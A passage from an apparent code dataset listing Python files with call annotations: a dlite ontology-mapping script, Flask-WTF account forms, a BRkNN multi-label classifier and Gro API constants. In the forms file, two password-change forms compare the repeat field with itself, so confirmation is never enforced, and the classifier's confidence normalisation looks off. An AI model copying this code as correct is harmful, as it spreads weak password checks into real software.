False, 'import re\n'), ((144, 12, 144, 44), 're.search', 're.search', ({(144, 22, 144, 37): '"""lemma="(.+?)\\""""', (144, 39, 144, 43): 'line'}, {}), '(\'lemma="(.+?)"\', line)', False, 'import re\n'), ((145, 11, 145, 41), 're.search', 're.search', ({(145, 21, 145, 34): '"""pos="(.+?)\\""""', (145, 36, 145, 40): 'line'}, {}), '(\'pos="(.+?)"\', line)', False, 'import re\n'), ((154, 18, 154, 56), 're.search', 're.search', ({(154, 28, 154, 49): '"""instance id="(.+?)\\""""', (154, 51, 154, 55): 'line'}, {}), '(\'instance id="(.+?)"\', line)', False, 'import re\n')] |
TorgeirUstad/dlite | examples/dehydrogenation/3-property-mappings/mappings_from_ontology/run_w_onto.py | 1d7b4ccec0e76799a25992534cd295a80d83878a | #!/usr/bin/env python3
from typing import Dict, AnyStr
from pathlib import Path
from ontopy import get_ontology
import dlite
from dlite.mappings import make_instance
# Setup dlite paths
thisdir = Path(__file__).parent.absolute()
rootdir = thisdir.parent.parent
workflow1dir = rootdir / '1-simple-workflow'
entitiesdir = rootdir / 'entities'
atomdata = workflow1dir / 'atomscaledata.json'
dlite.storage_path.append(f'{entitiesdir}/*.json')
# Define the calculation
def get_energy(reaction):
"""Calculates reaction energies with data from Substance entity
data is harvested from collection and mapped to Substance according to
mappings.
Args:
reaction: dict with names of reactants and products ase keys
and stochiometric coefficient as value
Negative stochiometric coefficients for reactants.
Positive stochiometric coefficients for products.
Returns:
reaction energy
"""
energy = 0
for label, n in reaction.items():
inst = make_instance(Substance, coll[label], mappings,
mapsTo=mapsTo)
        energy += n * inst.molecule_energy
return energy
# Import ontologies with mappings
molecules_onto = get_ontology(f'{thisdir}/mapping_mols.ttl').load()
reaction_onto = get_ontology(f'{thisdir}/mapping_substance.ttl').load()
# Convert the mappings to a single list of triples
mappings = list(molecules_onto.get_unabbreviated_triples())
mappings.extend(list(reaction_onto.get_unabbreviated_triples()))
# Obtain the Metadata to be mapped to each other
Molecule = dlite.get_instance('http://onto-ns.com/meta/0.1/Molecule')
Substance = dlite.get_instance('http://onto-ns.com/meta/0.1/Substance')
# Find mapping relation
# TODO: investigate what to do if the two ontologies
# use different mapping relations. As of now it is a
# hard requirement that they use the same one.
mapsTo = molecules_onto.mapsTo.iri
# Define where the molecule data is obtained from
# This is a dlite collection
coll = dlite.Collection(f'json://{atomdata}?mode=r#molecules', 0)
# input from chemical engineer, e.g. what are reactants and products
# reactants (left side of equation) have a negative stoichiometric coefficient
# products (right side of equation) have a positive stoichiometric coefficient
reaction1 = {'C2H6':-1, 'C2H4':1,'H2':1}
reaction_energy = get_energy(reaction1)
print('Reaction energy 1', reaction_energy)
reaction2 = {'C3H8':-1, 'H2': -2,'CH4':3}
reaction_energy2 = get_energy(reaction2)
print('Reaction energy 2', reaction_energy2)
# Map instance Molecule with label 'H2' to Substance
#inst = make_instance(Substance, coll['H2'], mappings)
#print(inst)
# Map instance Molecule with label 'H2' to itself
#inst2 = make_instance(Molecule, coll['H2'], mappings, strict=False)
#print(inst2)
| [((16, 0, 16, 50), 'dlite.storage_path.append', 'dlite.storage_path.append', ({(16, 26, 16, 49): 'f"""{entitiesdir}/*.json"""'}, {}), "(f'{entitiesdir}/*.json')", False, 'import dlite\n'), ((51, 11, 51, 69), 'dlite.get_instance', 'dlite.get_instance', ({(51, 30, 51, 68): '"""http://onto-ns.com/meta/0.1/Molecule"""'}, {}), "('http://onto-ns.com/meta/0.1/Molecule')", False, 'import dlite\n'), ((52, 12, 52, 71), 'dlite.get_instance', 'dlite.get_instance', ({(52, 31, 52, 70): '"""http://onto-ns.com/meta/0.1/Substance"""'}, {}), "('http://onto-ns.com/meta/0.1/Substance')", False, 'import dlite\n'), ((64, 7, 64, 65), 'dlite.Collection', 'dlite.Collection', ({(64, 24, 64, 61): 'f"""json://{atomdata}?mode=r#molecules"""', (64, 63, 64, 64): '0'}, {}), "(f'json://{atomdata}?mode=r#molecules', 0)", False, 'import dlite\n'), ((35, 15, 36, 43), 'dlite.mappings.make_instance', 'make_instance', (), '', False, 'from dlite.mappings import make_instance\n'), ((43, 17, 43, 60), 'ontopy.get_ontology', 'get_ontology', ({(43, 30, 43, 59): 'f"""{thisdir}/mapping_mols.ttl"""'}, {}), "(f'{thisdir}/mapping_mols.ttl')", False, 'from ontopy import get_ontology\n'), ((44, 16, 44, 64), 'ontopy.get_ontology', 'get_ontology', ({(44, 29, 44, 63): 'f"""{thisdir}/mapping_substance.ttl"""'}, {}), "(f'{thisdir}/mapping_substance.ttl')", False, 'from ontopy import get_ontology\n'), ((11, 10, 11, 24), 'pathlib.Path', 'Path', ({(11, 15, 11, 23): '__file__'}, {}), '(__file__)', False, 'from pathlib import Path\n')] |
lendoo73/my_idea_boxes | forms.py | c0d0e7bbd0b64ae35146f3792cd477d1ec8461b5 | from flask_wtf import FlaskForm
from flask_wtf.file import FileField, FileAllowed, FileRequired
from wtforms import StringField, PasswordField, BooleanField, TextAreaField, SubmitField, RadioField, HiddenField
from wtforms.fields.html5 import DateField, IntegerField
from wtforms.validators import ValidationError, DataRequired, Email, EqualTo, NumberRange
from models import Colleagues, Admins, Boxes, Ideas
class RegistrationFormCompany(FlaskForm):
company_name = StringField("Company name", validators = [DataRequired()])
user_name = StringField("Your User name", validators = [DataRequired()])
first_name = StringField("Your First name", validators = [DataRequired()])
last_name = StringField("Your Last name", validators = [DataRequired()])
position = StringField("Your Position", validators = [DataRequired()])
email = StringField("Email", validators = [DataRequired(), Email()])
founder_password = PasswordField("Your own Password", validators = [DataRequired()])
repeat_founder_password = PasswordField(
"Repeat Your Password",
validators = [DataRequired(),
EqualTo("founder_password")]
)
joining_password = PasswordField("Password for Colleagues to Joining", validators = [DataRequired()])
repeat_joining_password = PasswordField(
"Repeat Joining Password",
validators = [DataRequired(),
EqualTo("joining_password")]
)
submit = SubmitField("Register your Company")
class RegistrationFormColleague(FlaskForm):
company_name = StringField("Company name", validators = [DataRequired()])
joining_password = PasswordField("Password for Colleagues to Joining", validators = [DataRequired()])
user_name = StringField("Your User name", validators = [DataRequired()])
email = StringField("Email", validators = [DataRequired(), Email()])
first_name = StringField("Your First name", validators = [DataRequired()])
last_name = StringField("Your Last name", validators = [DataRequired()])
position = StringField("Your Position", validators = [DataRequired()])
password = PasswordField("Your Password", validators = [DataRequired()])
repeat_password = PasswordField(
"Repeat Password",
validators = [DataRequired(),
EqualTo("password")]
)
submit = SubmitField("Register")
class LoginForm(FlaskForm):
email_or_user_name = StringField("Email or User name", validators = [DataRequired()])
password = PasswordField("Password", validators = [DataRequired()])
remember_me = BooleanField("Remember Me")
submit = SubmitField("Sign In")
class ConfirmEmailForm(FlaskForm):
email = HiddenField("Email")
code = IntegerField(
"Confirmation code",
validators = [
DataRequired(),
NumberRange(
min = 100000,
max = 999999,
message = "Please enter the 6 digits you received in the email."
)
]
)
submit = SubmitField("Confirm my Email")
class UpdateFirstNameForm(FlaskForm):
first_name = StringField("First Name", validators = [DataRequired()])
submit = SubmitField("Update")
class UpdateLastNameForm(FlaskForm):
last_name = StringField("Last Name", validators = [DataRequired()])
submit = SubmitField("Update")
class UpdateEmailForm(FlaskForm):
email = StringField("Email", validators = [DataRequired(), Email()])
password = PasswordField("Password", validators = [DataRequired()])
submit = SubmitField("Update")
class UpdatePositionForm(FlaskForm):
position = StringField("Your Position", validators = [DataRequired()])
submit = SubmitField("Update")
class UpdatePasswordForm(FlaskForm):
password = PasswordField("Your Current Password", validators = [DataRequired()])
new_password = PasswordField("Your New Password", validators = [DataRequired()])
repeat_new_password = PasswordField(
"Repeat your New Password",
validators = [DataRequired(),
EqualTo("repeat_new_password")]
)
submit = SubmitField("Update")
allowed_format = ['png', 'svg', 'jpg', "jpeg"]
class UpdateAvatarForm(FlaskForm):
avatar = FileField(
"Choose an Avatar:",
validators = [
FileRequired(),
FileAllowed(allowed_format, f"Wrong format! Allowed: {allowed_format}.")
]
)
submit = SubmitField("Upload Avatar")
class DeleteColleagueForm(FlaskForm):
password = PasswordField("Your Password", validators = [DataRequired()])
submit = SubmitField("Delete Registration")
class UpdateLogoForm(FlaskForm):
logo = FileField(
"Choose your Company Logo:",
validators = [
FileRequired(),
FileAllowed(allowed_format, f"Wrong format! Allowed: {allowed_format}.")
]
)
submit = SubmitField("Upload Logo")
class UpdateCompanyNameForm(FlaskForm):
company_name = StringField("Company Name", validators = [DataRequired()])
submit = SubmitField("Update")
class UpdateJoiningPasswordForm(FlaskForm):
password = PasswordField("Current Joining Password", validators = [DataRequired()])
new_password = PasswordField("New Joining Password", validators = [DataRequired()])
repeat_new_password = PasswordField(
"Repeat New Password",
validators = [DataRequired(),
EqualTo("repeat_new_password")]
)
submit = SubmitField("Update")
class UpdatePrivilegsForm(FlaskForm):
update_company = BooleanField("Update Company")
update_privilegs = BooleanField("Update Privilegs")
update_colleague = BooleanField("Update Colleague")
update_box = BooleanField("Update Idea Box")
password = PasswordField("Your Password", validators = [DataRequired()])
submit = SubmitField("Update Privilegs")
class CreateBoxForm(FlaskForm):
name = StringField("Title", validators = [DataRequired()])
description = TextAreaField("Description", validators = [DataRequired()])
close_at = DateField("Close at", format = "%Y-%m-%d")
submit = SubmitField("Create Box")
class CreateIdeaForm(FlaskForm):
idea = TextAreaField("My Idea", validators= [DataRequired()])
sign = RadioField(
"Sign",
choices = [
("incognito", "incognito"),
("username", "username"),
("first name", "first name"),
("full name", "full name")
]
)
submit = SubmitField("Share my Idea") | [((27, 13, 27, 49), 'wtforms.SubmitField', 'SubmitField', ({(27, 25, 27, 48): '"""Register your Company"""'}, {}), "('Register your Company')", False, 'from wtforms import StringField, PasswordField, BooleanField, TextAreaField, SubmitField, RadioField, HiddenField\n'), ((44, 13, 44, 36), 'wtforms.SubmitField', 'SubmitField', ({(44, 25, 44, 35): '"""Register"""'}, {}), "('Register')", False, 'from wtforms import StringField, PasswordField, BooleanField, TextAreaField, SubmitField, RadioField, HiddenField\n'), ((49, 18, 49, 45), 'wtforms.BooleanField', 'BooleanField', ({(49, 31, 49, 44): '"""Remember Me"""'}, {}), "('Remember Me')", False, 'from wtforms import StringField, PasswordField, BooleanField, TextAreaField, SubmitField, RadioField, HiddenField\n'), ((50, 13, 50, 35), 'wtforms.SubmitField', 'SubmitField', ({(50, 25, 50, 34): '"""Sign In"""'}, {}), "('Sign In')", False, 'from wtforms import StringField, PasswordField, BooleanField, TextAreaField, SubmitField, RadioField, HiddenField\n'), ((53, 12, 53, 32), 'wtforms.HiddenField', 'HiddenField', ({(53, 24, 53, 31): '"""Email"""'}, {}), "('Email')", False, 'from wtforms import StringField, PasswordField, BooleanField, TextAreaField, SubmitField, RadioField, HiddenField\n'), ((65, 13, 65, 44), 'wtforms.SubmitField', 'SubmitField', ({(65, 25, 65, 43): '"""Confirm my Email"""'}, {}), "('Confirm my Email')", False, 'from wtforms import StringField, PasswordField, BooleanField, TextAreaField, SubmitField, RadioField, HiddenField\n'), ((69, 13, 69, 34), 'wtforms.SubmitField', 'SubmitField', ({(69, 25, 69, 33): '"""Update"""'}, {}), "('Update')", False, 'from wtforms import StringField, PasswordField, BooleanField, TextAreaField, SubmitField, RadioField, HiddenField\n'), ((73, 13, 73, 34), 'wtforms.SubmitField', 'SubmitField', ({(73, 25, 73, 33): '"""Update"""'}, {}), "('Update')", False, 'from wtforms import StringField, PasswordField, BooleanField, TextAreaField, SubmitField, RadioField, HiddenField\n'), ((78, 13, 78, 34), 'wtforms.SubmitField', 'SubmitField', ({(78, 25, 78, 33): '"""Update"""'}, {}), "('Update')", False, 'from wtforms import StringField, PasswordField, BooleanField, TextAreaField, SubmitField, RadioField, HiddenField\n'), ((82, 13, 82, 34), 'wtforms.SubmitField', 'SubmitField', ({(82, 25, 82, 33): '"""Update"""'}, {}), "('Update')", False, 'from wtforms import StringField, PasswordField, BooleanField, TextAreaField, SubmitField, RadioField, HiddenField\n'), ((93, 13, 93, 34), 'wtforms.SubmitField', 'SubmitField', ({(93, 25, 93, 33): '"""Update"""'}, {}), "('Update')", False, 'from wtforms import StringField, PasswordField, BooleanField, TextAreaField, SubmitField, RadioField, HiddenField\n'), ((104, 13, 104, 41), 'wtforms.SubmitField', 'SubmitField', ({(104, 25, 104, 40): '"""Upload Avatar"""'}, {}), "('Upload Avatar')", False, 'from wtforms import StringField, PasswordField, BooleanField, TextAreaField, SubmitField, RadioField, HiddenField\n'), ((108, 13, 108, 47), 'wtforms.SubmitField', 'SubmitField', ({(108, 25, 108, 46): '"""Delete Registration"""'}, {}), "('Delete Registration')", False, 'from wtforms import StringField, PasswordField, BooleanField, TextAreaField, SubmitField, RadioField, HiddenField\n'), ((118, 13, 118, 39), 'wtforms.SubmitField', 'SubmitField', ({(118, 25, 118, 38): '"""Upload Logo"""'}, {}), "('Upload Logo')", False, 'from wtforms import StringField, PasswordField, BooleanField, TextAreaField, SubmitField, RadioField, HiddenField\n'), ((122, 13, 122, 34), 
'wtforms.SubmitField', 'SubmitField', ({(122, 25, 122, 33): '"""Update"""'}, {}), "('Update')", False, 'from wtforms import StringField, PasswordField, BooleanField, TextAreaField, SubmitField, RadioField, HiddenField\n'), ((133, 13, 133, 34), 'wtforms.SubmitField', 'SubmitField', ({(133, 25, 133, 33): '"""Update"""'}, {}), "('Update')", False, 'from wtforms import StringField, PasswordField, BooleanField, TextAreaField, SubmitField, RadioField, HiddenField\n'), ((136, 21, 136, 51), 'wtforms.BooleanField', 'BooleanField', ({(136, 34, 136, 50): '"""Update Company"""'}, {}), "('Update Company')", False, 'from wtforms import StringField, PasswordField, BooleanField, TextAreaField, SubmitField, RadioField, HiddenField\n'), ((137, 23, 137, 55), 'wtforms.BooleanField', 'BooleanField', ({(137, 36, 137, 54): '"""Update Privilegs"""'}, {}), "('Update Privilegs')", False, 'from wtforms import StringField, PasswordField, BooleanField, TextAreaField, SubmitField, RadioField, HiddenField\n'), ((138, 23, 138, 55), 'wtforms.BooleanField', 'BooleanField', ({(138, 36, 138, 54): '"""Update Colleague"""'}, {}), "('Update Colleague')", False, 'from wtforms import StringField, PasswordField, BooleanField, TextAreaField, SubmitField, RadioField, HiddenField\n'), ((139, 17, 139, 48), 'wtforms.BooleanField', 'BooleanField', ({(139, 30, 139, 47): '"""Update Idea Box"""'}, {}), "('Update Idea Box')", False, 'from wtforms import StringField, PasswordField, BooleanField, TextAreaField, SubmitField, RadioField, HiddenField\n'), ((141, 13, 141, 44), 'wtforms.SubmitField', 'SubmitField', ({(141, 25, 141, 43): '"""Update Privilegs"""'}, {}), "('Update Privilegs')", False, 'from wtforms import StringField, PasswordField, BooleanField, TextAreaField, SubmitField, RadioField, HiddenField\n'), ((146, 15, 146, 57), 'wtforms.fields.html5.DateField', 'DateField', (), '', False, 'from wtforms.fields.html5 import DateField, IntegerField\n'), ((147, 13, 147, 38), 'wtforms.SubmitField', 'SubmitField', ({(147, 25, 147, 37): '"""Create Box"""'}, {}), "('Create Box')", False, 'from wtforms import StringField, PasswordField, BooleanField, TextAreaField, SubmitField, RadioField, HiddenField\n'), ((151, 11, 159, 5), 'wtforms.RadioField', 'RadioField', (), '', False, 'from wtforms import StringField, PasswordField, BooleanField, TextAreaField, SubmitField, RadioField, HiddenField\n'), ((160, 13, 160, 41), 'wtforms.SubmitField', 'SubmitField', ({(160, 25, 160, 40): '"""Share my Idea"""'}, {}), "('Share my Idea')", False, 'from wtforms import StringField, PasswordField, BooleanField, TextAreaField, SubmitField, RadioField, HiddenField\n'), ((9, 61, 9, 75), 'wtforms.validators.DataRequired', 'DataRequired', ({}, {}), '()', False, 'from wtforms.validators import ValidationError, DataRequired, Email, EqualTo, NumberRange\n'), ((10, 60, 10, 74), 'wtforms.validators.DataRequired', 'DataRequired', ({}, {}), '()', False, 'from wtforms.validators import ValidationError, DataRequired, Email, EqualTo, NumberRange\n'), ((11, 62, 11, 76), 'wtforms.validators.DataRequired', 'DataRequired', ({}, {}), '()', False, 'from wtforms.validators import ValidationError, DataRequired, Email, EqualTo, NumberRange\n'), ((12, 60, 12, 74), 'wtforms.validators.DataRequired', 'DataRequired', ({}, {}), '()', False, 'from wtforms.validators import ValidationError, DataRequired, Email, EqualTo, NumberRange\n'), ((13, 58, 13, 72), 'wtforms.validators.DataRequired', 'DataRequired', ({}, {}), '()', False, 'from wtforms.validators import ValidationError, DataRequired, Email, 
EqualTo, NumberRange\n'), ((14, 47, 14, 61), 'wtforms.validators.DataRequired', 'DataRequired', ({}, {}), '()', False, 'from wtforms.validators import ValidationError, DataRequired, Email, EqualTo, NumberRange\n'), ((14, 63, 14, 70), 'wtforms.validators.Email', 'Email', ({}, {}), '()', False, 'from wtforms.validators import ValidationError, DataRequired, Email, EqualTo, NumberRange\n'), ((15, 72, 15, 86), 'wtforms.validators.DataRequired', 'DataRequired', ({}, {}), '()', False, 'from wtforms.validators import ValidationError, DataRequired, Email, EqualTo, NumberRange\n'), ((18, 22, 18, 36), 'wtforms.validators.DataRequired', 'DataRequired', ({}, {}), '()', False, 'from wtforms.validators import ValidationError, DataRequired, Email, EqualTo, NumberRange\n'), ((19, 8, 19, 35), 'wtforms.validators.EqualTo', 'EqualTo', ({(19, 16, 19, 34): '"""founder_password"""'}, {}), "('founder_password')", False, 'from wtforms.validators import ValidationError, DataRequired, Email, EqualTo, NumberRange\n'), ((21, 89, 21, 103), 'wtforms.validators.DataRequired', 'DataRequired', ({}, {}), '()', False, 'from wtforms.validators import ValidationError, DataRequired, Email, EqualTo, NumberRange\n'), ((24, 22, 24, 36), 'wtforms.validators.DataRequired', 'DataRequired', ({}, {}), '()', False, 'from wtforms.validators import ValidationError, DataRequired, Email, EqualTo, NumberRange\n'), ((25, 8, 25, 35), 'wtforms.validators.EqualTo', 'EqualTo', ({(25, 16, 25, 34): '"""joining_password"""'}, {}), "('joining_password')", False, 'from wtforms.validators import ValidationError, DataRequired, Email, EqualTo, NumberRange\n'), ((30, 61, 30, 75), 'wtforms.validators.DataRequired', 'DataRequired', ({}, {}), '()', False, 'from wtforms.validators import ValidationError, DataRequired, Email, EqualTo, NumberRange\n'), ((31, 89, 31, 103), 'wtforms.validators.DataRequired', 'DataRequired', ({}, {}), '()', False, 'from wtforms.validators import ValidationError, DataRequired, Email, EqualTo, NumberRange\n'), ((32, 60, 32, 74), 'wtforms.validators.DataRequired', 'DataRequired', ({}, {}), '()', False, 'from wtforms.validators import ValidationError, DataRequired, Email, EqualTo, NumberRange\n'), ((33, 47, 33, 61), 'wtforms.validators.DataRequired', 'DataRequired', ({}, {}), '()', False, 'from wtforms.validators import ValidationError, DataRequired, Email, EqualTo, NumberRange\n'), ((33, 63, 33, 70), 'wtforms.validators.Email', 'Email', ({}, {}), '()', False, 'from wtforms.validators import ValidationError, DataRequired, Email, EqualTo, NumberRange\n'), ((34, 62, 34, 76), 'wtforms.validators.DataRequired', 'DataRequired', ({}, {}), '()', False, 'from wtforms.validators import ValidationError, DataRequired, Email, EqualTo, NumberRange\n'), ((35, 60, 35, 74), 'wtforms.validators.DataRequired', 'DataRequired', ({}, {}), '()', False, 'from wtforms.validators import ValidationError, DataRequired, Email, EqualTo, NumberRange\n'), ((36, 58, 36, 72), 'wtforms.validators.DataRequired', 'DataRequired', ({}, {}), '()', False, 'from wtforms.validators import ValidationError, DataRequired, Email, EqualTo, NumberRange\n'), ((37, 60, 37, 74), 'wtforms.validators.DataRequired', 'DataRequired', ({}, {}), '()', False, 'from wtforms.validators import ValidationError, DataRequired, Email, EqualTo, NumberRange\n'), ((40, 22, 40, 36), 'wtforms.validators.DataRequired', 'DataRequired', ({}, {}), '()', False, 'from wtforms.validators import ValidationError, DataRequired, Email, EqualTo, NumberRange\n'), ((41, 8, 41, 27), 'wtforms.validators.EqualTo', 
'EqualTo', ({(41, 16, 41, 26): '"""password"""'}, {}), "('password')", False, 'from wtforms.validators import ValidationError, DataRequired, Email, EqualTo, NumberRange\n'), ((47, 73, 47, 87), 'wtforms.validators.DataRequired', 'DataRequired', ({}, {}), '()', False, 'from wtforms.validators import ValidationError, DataRequired, Email, EqualTo, NumberRange\n'), ((48, 55, 48, 69), 'wtforms.validators.DataRequired', 'DataRequired', ({}, {}), '()', False, 'from wtforms.validators import ValidationError, DataRequired, Email, EqualTo, NumberRange\n'), ((57, 12, 57, 26), 'wtforms.validators.DataRequired', 'DataRequired', ({}, {}), '()', False, 'from wtforms.validators import ValidationError, DataRequired, Email, EqualTo, NumberRange\n'), ((58, 12, 62, 13), 'wtforms.validators.NumberRange', 'NumberRange', (), '', False, 'from wtforms.validators import ValidationError, DataRequired, Email, EqualTo, NumberRange\n'), ((68, 57, 68, 71), 'wtforms.validators.DataRequired', 'DataRequired', ({}, {}), '()', False, 'from wtforms.validators import ValidationError, DataRequired, Email, EqualTo, NumberRange\n'), ((72, 55, 72, 69), 'wtforms.validators.DataRequired', 'DataRequired', ({}, {}), '()', False, 'from wtforms.validators import ValidationError, DataRequired, Email, EqualTo, NumberRange\n'), ((76, 47, 76, 61), 'wtforms.validators.DataRequired', 'DataRequired', ({}, {}), '()', False, 'from wtforms.validators import ValidationError, DataRequired, Email, EqualTo, NumberRange\n'), ((76, 63, 76, 70), 'wtforms.validators.Email', 'Email', ({}, {}), '()', False, 'from wtforms.validators import ValidationError, DataRequired, Email, EqualTo, NumberRange\n'), ((77, 55, 77, 69), 'wtforms.validators.DataRequired', 'DataRequired', ({}, {}), '()', False, 'from wtforms.validators import ValidationError, DataRequired, Email, EqualTo, NumberRange\n'), ((81, 58, 81, 72), 'wtforms.validators.DataRequired', 'DataRequired', ({}, {}), '()', False, 'from wtforms.validators import ValidationError, DataRequired, Email, EqualTo, NumberRange\n'), ((85, 68, 85, 82), 'wtforms.validators.DataRequired', 'DataRequired', ({}, {}), '()', False, 'from wtforms.validators import ValidationError, DataRequired, Email, EqualTo, NumberRange\n'), ((86, 68, 86, 82), 'wtforms.validators.DataRequired', 'DataRequired', ({}, {}), '()', False, 'from wtforms.validators import ValidationError, DataRequired, Email, EqualTo, NumberRange\n'), ((89, 22, 89, 36), 'wtforms.validators.DataRequired', 'DataRequired', ({}, {}), '()', False, 'from wtforms.validators import ValidationError, DataRequired, Email, EqualTo, NumberRange\n'), ((90, 8, 90, 38), 'wtforms.validators.EqualTo', 'EqualTo', ({(90, 16, 90, 37): '"""repeat_new_password"""'}, {}), "('repeat_new_password')", False, 'from wtforms.validators import ValidationError, DataRequired, Email, EqualTo, NumberRange\n'), ((100, 12, 100, 26), 'flask_wtf.file.FileRequired', 'FileRequired', ({}, {}), '()', False, 'from flask_wtf.file import FileField, FileAllowed, FileRequired\n'), ((101, 12, 101, 84), 'flask_wtf.file.FileAllowed', 'FileAllowed', ({(101, 24, 101, 38): 'allowed_format', (101, 40, 101, 83): 'f"""Wrong format! Allowed: {allowed_format}."""'}, {}), "(allowed_format, f'Wrong format! 
Allowed: {allowed_format}.')", False, 'from flask_wtf.file import FileField, FileAllowed, FileRequired\n'), ((107, 60, 107, 74), 'wtforms.validators.DataRequired', 'DataRequired', ({}, {}), '()', False, 'from wtforms.validators import ValidationError, DataRequired, Email, EqualTo, NumberRange\n'), ((114, 12, 114, 26), 'flask_wtf.file.FileRequired', 'FileRequired', ({}, {}), '()', False, 'from flask_wtf.file import FileField, FileAllowed, FileRequired\n'), ((115, 12, 115, 84), 'flask_wtf.file.FileAllowed', 'FileAllowed', ({(115, 24, 115, 38): 'allowed_format', (115, 40, 115, 83): 'f"""Wrong format! Allowed: {allowed_format}."""'}, {}), "(allowed_format, f'Wrong format! Allowed: {allowed_format}.')", False, 'from flask_wtf.file import FileField, FileAllowed, FileRequired\n'), ((121, 61, 121, 75), 'wtforms.validators.DataRequired', 'DataRequired', ({}, {}), '()', False, 'from wtforms.validators import ValidationError, DataRequired, Email, EqualTo, NumberRange\n'), ((125, 71, 125, 85), 'wtforms.validators.DataRequired', 'DataRequired', ({}, {}), '()', False, 'from wtforms.validators import ValidationError, DataRequired, Email, EqualTo, NumberRange\n'), ((126, 71, 126, 85), 'wtforms.validators.DataRequired', 'DataRequired', ({}, {}), '()', False, 'from wtforms.validators import ValidationError, DataRequired, Email, EqualTo, NumberRange\n'), ((129, 22, 129, 36), 'wtforms.validators.DataRequired', 'DataRequired', ({}, {}), '()', False, 'from wtforms.validators import ValidationError, DataRequired, Email, EqualTo, NumberRange\n'), ((130, 8, 130, 38), 'wtforms.validators.EqualTo', 'EqualTo', ({(130, 16, 130, 37): '"""repeat_new_password"""'}, {}), "('repeat_new_password')", False, 'from wtforms.validators import ValidationError, DataRequired, Email, EqualTo, NumberRange\n'), ((140, 60, 140, 74), 'wtforms.validators.DataRequired', 'DataRequired', ({}, {}), '()', False, 'from wtforms.validators import ValidationError, DataRequired, Email, EqualTo, NumberRange\n'), ((144, 46, 144, 60), 'wtforms.validators.DataRequired', 'DataRequired', ({}, {}), '()', False, 'from wtforms.validators import ValidationError, DataRequired, Email, EqualTo, NumberRange\n'), ((145, 61, 145, 75), 'wtforms.validators.DataRequired', 'DataRequired', ({}, {}), '()', False, 'from wtforms.validators import ValidationError, DataRequired, Email, EqualTo, NumberRange\n'), ((150, 49, 150, 63), 'wtforms.validators.DataRequired', 'DataRequired', ({}, {}), '()', False, 'from wtforms.validators import ValidationError, DataRequired, Email, EqualTo, NumberRange\n')] |
fullmooncj/textmining_edu | 5.analysis/scikit-multilearn-master/skmultilearn/adapt/brknn.py | b1402fd96fbde945f48c52d71ba4dfe51fd96602 | from builtins import range
from ..base import MLClassifierBase
from ..utils import get_matrix_in_format
from sklearn.neighbors import NearestNeighbors
import scipy.sparse as sparse
import numpy as np
class BinaryRelevanceKNN(MLClassifierBase):
"""Binary Relevance adapted kNN Multi-Label Classifier."""
def __init__(self, k = 10):
super(BinaryRelevanceKNN, self).__init__()
self.k = k # Number of neighbours
self.copyable_attrs = ['k']
def fit(self, X, y):
"""Fit classifier with training data
Internally this method uses a sparse CSC representation for y
(:py:class:`scipy.sparse.csc_matrix`).
:param X: input features
:type X: dense or sparse matrix (n_samples, n_features)
:param y: binary indicator matrix with label assignments
:type y: dense or sparse matrix of {0, 1} (n_samples, n_labels)
:returns: Fitted instance of self
"""
self.train_labelspace = get_matrix_in_format(y, 'csc')
self.num_instances = self.train_labelspace.shape[0]
self.num_labels = self.train_labelspace.shape[1]
self.knn = NearestNeighbors(self.k).fit(X)
return self
def compute_confidences(self):
# % of neighbours that have a given label assigned
        # sum over each label column after subsetting for neighbours
# and normalize
self.confidences = np.vstack([self.train_labelspace[n,:].tocsc().sum(axis=0) / float(self.num_labels) for n in self.neighbors])
return self.confidences
def predict(self, X):
"""Predict labels for X
:param X: input features
:type X: dense or sparse matrix (n_samples, n_features)
:returns: binary indicator matrix with label assignments
:rtype: sparse matrix of int (n_samples, n_labels)
"""
self.neighbors = self.knn.kneighbors(X, self.k, return_distance=False)
self.compute_confidences()
return self.predict_variant(X)
class BRkNNaClassifier(BinaryRelevanceKNN):
"""Binary Relevance multi-label classifier based on k Nearest Neighbours method.
This version of the classifier assigns the labels that are assigned to at least half of the neighbors.
:param int k: number of neighbors
"""
def predict_variant(self, X):
        # TODO: find out if moving the sparsity to compute_confidences boosts speed
return sparse.csr_matrix(np.rint(self.confidences), dtype='i8')
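# Hedged usage sketch (illustration only, not part of the original module): following
# the fit()/predict() contract documented above,
#     clf = BRkNNaClassifier(k=10)
#     clf.fit(X_train, y_train)        # y_train: binary indicator matrix (n_samples, n_labels)
#     y_pred = clf.predict(X_test)     # sparse int indicator matrix (n_samples, n_labels)
# X_train/X_test/y_train are hypothetical arrays; BRkNNbClassifier below is used the same way.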
class BRkNNbClassifier(BinaryRelevanceKNN):
"""Binary Relevance multi-label classifier based on k Nearest Neighbours method.
This version of the classifier assigns the most popular m labels of the neighbors, where m is the
average number of labels assigned to the object's neighbors.
:param int k: number of neighbors
"""
def predict_variant(self, X):
self.avg_labels = [int(np.average(self.train_labelspace[n,:].sum(axis=1)).round()) for n in self.neighbors]
prediction = sparse.lil_matrix((X.shape[0], self.num_labels), dtype='i8')
top_labels = np.argpartition(self.confidences, kth=min(self.avg_labels, len(self.confidences[0])), axis=1).tolist()
for i in range(X.shape[0]):
for j in top_labels[i][-self.avg_labels[i]:]:
prediction[i,j] += 1
return prediction | [((83, 21, 83, 81), 'scipy.sparse.lil_matrix', 'sparse.lil_matrix', (), '', True, 'import scipy.sparse as sparse\n'), ((86, 17, 86, 34), 'builtins.range', 'range', ({(86, 23, 86, 33): 'X.shape[0]'}, {}), '(X.shape[0])', False, 'from builtins import range\n'), ((68, 33, 68, 58), 'numpy.rint', 'np.rint', ({(68, 41, 68, 57): 'self.confidences'}, {}), '(self.confidences)', True, 'import numpy as np\n'), ((32, 19, 32, 43), 'sklearn.neighbors.NearestNeighbors', 'NearestNeighbors', ({(32, 36, 32, 42): 'self.k'}, {}), '(self.k)', False, 'from sklearn.neighbors import NearestNeighbors\n')] |
eric-gro/api-client | groclient/constants.py | 0ca73422c25b5065907d068a44b72bdc43fea79f | """Constants about the Gro ontology that can be imported and re-used anywhere."""
REGION_LEVELS = {
'world': 1,
'continent': 2,
'country': 3,
'province': 4, # Equivalent to state in the United States
'district': 5, # Equivalent to county in the United States
'city': 6,
'market': 7,
'other': 8,
'coordinate': 9
}
ENTITY_TYPES_PLURAL = ['metrics', 'items', 'regions', 'frequencies', 'sources', 'units']
DATA_SERIES_UNIQUE_TYPES_ID = [
'metric_id',
'item_id',
'region_id',
'partner_region_id',
'frequency_id',
'source_id'
]
ENTITY_KEY_TO_TYPE = {
'metric_id': 'metrics',
'item_id': 'items',
'region_id': 'regions',
'partner_region_id': 'regions',
'source_id': 'sources',
'frequency_id': 'frequencies',
'unit_id': 'units'
}
